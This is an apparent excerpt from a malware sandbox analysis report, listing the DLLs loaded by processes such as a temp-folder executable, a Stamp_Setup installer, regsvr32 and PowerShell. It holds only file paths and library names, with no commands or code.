                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: msimg32.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: shfolder.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: edputil.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: windows.staterepositoryps.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: appresolver.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: bcp47langs.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: slc.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: sppc.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: onecorecommonproxystub.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmpSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: msimg32.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: version.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: textinputframework.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: coreuicomponents.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: coremessaging.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: ntmarta.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: wintypes.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: shfolder.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: dwmapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: explorerframe.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: sfc.dll
                              Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmpSection loaded: sfc_os.dll
                              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxx.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: nvapi64.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: winnsi.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: rasapi32.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: rasman.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: rtutils.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: winhttp.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: schannel.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: mskeyprotect.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: ncrypt.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: ncryptsslp.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\regsvr32.exeSection loaded: atiadlxy.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
